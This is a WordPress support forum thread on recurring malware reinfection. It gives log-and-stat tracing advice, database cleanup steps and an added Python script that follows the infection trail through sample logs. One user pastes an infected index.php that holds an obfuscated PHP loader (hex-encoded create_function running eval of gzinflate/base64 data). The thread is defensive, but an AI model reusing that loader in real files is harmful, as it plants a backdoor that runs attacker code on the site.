• Resolved Thami

    (@menszone)


    Hello,

    Thank you for this plugin, which I deactivated for a while thinking I didn’t need it anymore, until I was attacked. Anyway, after scanning my website with your plugin, it indeed found the malicious file and fixed it. A few minutes later, my website is broken again after I tried to make some changes. I have tried to restore several backups for 2 days now, and I scan and rescan it with your plugin; it comes and goes. I am a little lost.

    Thank you for your help.

  • visit https://wprepublic.com/security/how-to-trace-and-clean-the-monit-php-hack/ for a useful method.

    Log in to your WordPress MySQL database, go to wp_options and delete:
    ad_code
    hide_admin
    hide_logged_in
    display_ad
    search_engines
    auto_update
    ip_admin
    cookies_admin
    logged_admin
    log_install

    After deleting these options from the wp_options table, log in to your FTP (or SFTP) and delete admins_ip.txt from the wp-content/plugins folder.

    good luck

    • This reply was modified 3 years, 3 months ago by frankytee.
    Plugin Author Eli

    (@scheeeli)

    The problem is not cleaning out the hack, my plugin will do that automatically. The problem is that you keep getting reinfected with the same malicious code. There is clearly still some vulnerable exploit on your server that is letting hackers reinfect these same files over and over again.

    The best way to find and fix this security hole is to stat the infected files before you clean them to get the exact time of the infection. If you have already cleaned this infection at least once then there will be a record of the infection times in your Anti-Malware Quarantine page in your wp-admin. Once you have the exact time that any of these infections took place then you can simply cross-reference that exact time in the raw access_log files on your server. This will tell you what scripts or URLs were called to infect those files, and that will point you to the plugin or theme file that is vulnerable to this exploit.

    Then upgrade or remove the vulnerable plugin or theme and notify the developer.

    Hi, I have the same problem. I followed your advice but my site is still reinfected.

    /wp-includes/js/codemirror/fxtiqfnh.php is the path I found in the log.

    Yesterday I found another URL that contains the name of a plugin and I deleted it, but today same problem: /wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php

    Should I also remove the records from the db as suggested by frankytee?

    • This reply was modified 3 years, 2 months ago by fedeanimation.
    Plugin Author Eli

    (@scheeeli)

    You can remove those db entries but that will not stop your repeated infections from coming back. As I said, you need to track down the script that is responsible for this exploit, and the best way to do that is by analyzing the logged activity at the exact time of the infection, as outlined above.

    Your description is missing some steps, can you elaborate:
    1. wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php is infected.
    2. stat wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php
    3. find the activity in the log corresponding to the time returned by stat.
    4. activity was a call to wp-includes/js/codemirror/fxtiqfnh.php
    5. stat wp-includes/js/codemirror/fxtiqfnh.php … when was it last modified?
    6. find the activity in the log corresponding to the time it was last modified.
    7. What was used to write to wp-includes/js/codemirror/fxtiqfnh.php???

    so-on and so-forth…

    Note: If your site is on a shared hosting platform then you may need to be checking the log files for the other sites as well, because an infection on one site can frequently be called upon to infect the other sites on the same server.

    When you have a complete trail to all infections then you can remove the infection and watch those files to make sure that the infection doesn’t come back. If it does then you have missed something in the trail you followed, and you can do it again and make sure you get them all. New modified times, new log entries, look for the same files AND any other files in the logs that you may have missed the first time.

    Note: Your trail will usually end with a file that was modified so long ago that there are no logs for that time, or else with a file that you can explain where it came from and did not realize was infected when you installed it.

    Also note that my plugin should be able to find and fix all these infections for you automatically, and if there are any files that you find in your trail that were not identified as a threat by my plugin in the Complete Scan then please email those files directly to me so that I can add them to my definition updates and they can then be automatically removed with the rest.

    eli AT gotmls DOT net
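    The stat-then-log loop in steps 1 through 7 above, as an added example that is not part of the original thread: each hop takes a file's mtime from stat, pulls the access_log requests within a few seconds of it, and treats the closest POST to a PHP script as the writer, then repeats with that script. The stat results, the log lines and the EXAMPLE-PLUGIN/upload.php entry point are constructed sample data; only the two .php paths named in the thread are taken from it.

```python
import re
from datetime import datetime, timedelta, timezone

# Combined log format: the timestamp sits in square brackets, the request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse one access_log line into a dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"), "status": int(m.group("status")),
            "path": m.group("path").split("?")[0],
            "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")}

def requests_near(lines, mtime, window=timedelta(seconds=5)):
    """Steps 3 and 6: every request logged within +/- window of a file's stat mtime."""
    hits = [r for r in map(parse_line, lines) if r and abs(r["time"] - mtime) <= window]
    # A POST to a PHP file is the likeliest writer, so rank those first, closest in time first.
    return sorted(hits, key=lambda r: (r["method"] != "POST", abs(r["time"] - mtime)))

def follow_trail(start, mtimes, lines, window=timedelta(seconds=5)):
    """Repeat 'stat -> log -> script that was called' until no stat is available or no PHP script was hit."""
    trail, current = [], start
    while current and current not in trail:
        trail.append(current)
        mtime = mtimes.get(current)
        if mtime is None:                      # file gone, or never stat'ed: the trail ends here
            break
        writers = [r for r in requests_near(lines, mtime, window)
                   if r["path"].endswith(".php") and r["path"] != current]
        current = writers[0]["path"] if writers else None
    return trail

# --- Constructed sample data (not real logs); the two infected paths are the ones named in the thread. ---
UTC = timezone.utc
MTIMES = {  # what `stat` reported for each file, as tz-aware datetimes
    "/wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php": datetime(2019, 3, 4, 10, 15, 42, tzinfo=UTC),
    "/wp-includes/js/codemirror/fxtiqfnh.php": datetime(2019, 3, 3, 22, 40, 9, tzinfo=UTC),
}
ACCESS_LOG = [
    '192.0.2.10 - - [04/Mar/2019:09:58:03 +0000] "GET / HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Mar/2019:22:40:08 +0000] "POST /wp-content/plugins/EXAMPLE-PLUGIN/upload.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Mar/2019:22:40:09 +0000] "GET /wp-includes/js/codemirror/fxtiqfnh.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Mar/2019:10:15:41 +0000] "POST /wp-includes/js/codemirror/fxtiqfnh.php?a=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [04/Mar/2019:10:15:42 +0000] "GET /wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php HTTP/1.1" 200 31 "-" "curl/7.64.0"',
]

if __name__ == "__main__":
    for hop in follow_trail("/wp-content/plugins/nextend-facebook-connect/includes/csqygqcf.php", MTIMES, ACCESS_LOG):
        print(hop)
```

    The trail stops at upload.php because no stat entry exists for it, which is the point where the plugin owning that endpoint needs to be updated or removed.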

    Hi Eli
    I am also facing a similar issue. The infected file in my case is index.php.
    As suggested I am sending the file to your above mentioned email.
    Thanks in anticipation
    FYI (it looks like this)

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */$oO0="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$o0O=@$oO0('$x',"\x65\x76\x61\x6c\x28\x22\x3f\x3e\x22\x2e\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x78\x29\x29\x29\x3b");@$o0O("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");
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define( 'WP_USE_THEMES', true );
    
    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . '/wp-blog-header.php' );
    Plugin Author Eli

    (@scheeeli)

    @manujks,
    You did not understand my suggestion then, because I ask users to send me the infected files only if they were not detected by my plugin, and this infection is already in my definition updates, so it can already be removed automatically by running the Complete Scan and clicking the Automatic Fix button.

    However, if this infection keeps coming back every time you remove it then you need to follow steps 1 through 7 outlined in my last post. That simple process will uncover the source of this infection and if the threats you find are not already detected by my plugin then that is what you should send me.

    If you are unable to stat the infected file because it was deleted, or the stat shows only the date that you removed the infection because it was already fixed, then it is possible to get the original infection times from the Anti-Malware Quarantine page in your wp-admin if you used my plugin to fix those infected files. Use those infection times to cross-reference with your access_log files to see what scripts were called to write the infections to those files.

  • The topic ‘Malware cleaned but came back’ is closed to new replies.